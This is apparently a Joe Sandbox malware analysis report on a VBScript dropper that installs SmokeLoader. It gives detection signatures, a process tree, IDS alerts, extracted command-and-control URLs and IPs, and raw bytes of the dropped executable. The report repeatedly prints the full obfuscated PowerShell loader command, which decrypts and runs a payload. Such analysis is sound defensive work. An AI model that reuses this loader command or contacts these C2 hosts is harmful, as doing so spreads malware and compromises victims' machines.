Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs

Overview

General Information

Sample name:#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs
renamed because original name is a hash value
Original sample name:i ii.vbs
Analysis ID:1578027
MD5:4c2a534b731225c4afa0409c6c16ae19
SHA1:97c5cf1b10a2036a0f897883d00bcf11b3c8a93c
SHA256:06fe27eb26975a1cb680fff55f815be29e440a0f2312dbc93171f6aa822fb441
Tags:vbsuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2068 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • putty.exe (PID: 2056 cmdline: "C:\Users\user\AppData\Roaming\putty.exe" MD5: C02B57E6771A13513DC087F6B45ADAB0)
        • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • edrecib (PID: 3976 cmdline: C:\Users\user\AppData\Roaming\edrecib MD5: C02B57E6771A13513DC087F6B45ADAB0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1635941173.0000000000530000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x11c92:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x204:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000007.00000002.1858608967.0000000000530000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x11c92:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000007.00000002.1858830240.0000000000981000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 10 entries
      SourceRuleDescriptionAuthorStrings
      4.2.putty.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        7.3.edrecib.5c0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          4.3.putty.exe.600000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            7.2.edrecib.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              4.2.putty.exe.5f0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 1 entries

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs", ProcessId: 2068, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\edrecib, CommandLine: C:\Users\user\AppData\Roaming\edrecib, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\edrecib, NewProcessName: C:\Users\user\AppData\Roaming\edrecib, OriginalFileName: C:\Users\user\AppData\Roaming\edrecib, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\edrecib, ProcessId: 3976, ProcessName: edrecib
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6012, TargetFilename: C:\Users\user\AppData\Roaming\putty.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs", ProcessId: 2068, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T07:52:52.629854+010020259931Malware Command and Control Activity Detected192.168.2.84971294.156.177.5180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T07:52:50.817416+010020391031A Network Trojan was detected192.168.2.84971194.156.177.5180TCP
                2024-12-19T07:52:52.629854+010020391031A Network Trojan was detected192.168.2.84971294.156.177.5180TCP
                2024-12-19T07:53:14.751358+010020391031A Network Trojan was detected192.168.2.849713109.70.26.3780TCP
                2024-12-19T07:54:21.614261+010020391031A Network Trojan was detected192.168.2.84981994.156.177.5180TCP
                2024-12-19T07:54:23.208125+010020391031A Network Trojan was detected192.168.2.84982594.156.177.5180TCP
                2024-12-19T07:54:24.692618+010020391031A Network Trojan was detected192.168.2.849826109.70.26.3780TCP
                2024-12-19T07:54:26.614279+010020391031A Network Trojan was detected192.168.2.84983294.156.177.5180TCP
                2024-12-19T07:54:28.083025+010020391031A Network Trojan was detected192.168.2.84983894.156.177.5180TCP
                2024-12-19T07:54:29.692497+010020391031A Network Trojan was detected192.168.2.849843109.70.26.3780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T07:52:52.629854+010028518151A Network Trojan was detected192.168.2.84971294.156.177.5180TCP
                2024-12-19T07:54:21.614261+010028518151A Network Trojan was detected192.168.2.84981994.156.177.5180TCP
                2024-12-19T07:54:23.208125+010028518151A Network Trojan was detected192.168.2.84982594.156.177.5180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Roaming\putty.exeAvira: detection malicious, Label: HEUR/AGEN.1306978
                Source: C:\Users\user\AppData\Roaming\edrecibAvira: detection malicious, Label: HEUR/AGEN.1306978
                Source: 00000004.00000002.1636745792.0000000000600000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
                Source: #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsReversingLabs: Detection: 21%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\putty.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\edrecibJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49711 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2025993 - Severity 1 - ET MALWARE Sharik/Smoke CnC Beacon 11 : 192.168.2.8:49712 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49712 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.8:49712 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49713 -> 109.70.26.37:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49819 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.8:49819 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49838 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49843 -> 109.70.26.37:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49825 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.8:49825 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49832 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49826 -> 109.70.26.37:80
                Source: C:\Windows\explorer.exeNetwork Connect: 109.70.26.37 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                Source: Malware configuration extractorURLs: http://constractionscity1991.lat/
                Source: Malware configuration extractorURLs: http://restructurisationservice.ru/
                Source: Malware configuration extractorURLs: http://connecticutproperty.ru/
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 19 Dec 2024 06:52:23 GMTContent-Type: application/x-msdos-programContent-Length: 295424Connection: keep-aliveLast-Modified: Thu, 19 Dec 2024 06:52:23 GMTETag: W/"48200-62999fe73c900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 cf c2 6a d7 ae ac 39 d7 ae ac 39 d7 ae ac 39 c9 fc 39 39 cd ae ac 39 c9 fc 2f 39 51 ae ac 39 c9 fc 28 39 fd ae ac 39 f0 68 d7 39 d4 ae ac 39 d7 ae ad 39 ac ae ac 39 c9 fc 26 39 d6 ae ac 39 c9 fc 38 39 d6 ae ac 39 c9 fc 3d 39 d6 ae ac 39 52 69 63 68 d7 ae ac 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 c4 9b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 03 00 00 04 01 00 00 00 00 00 a2 49 00 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 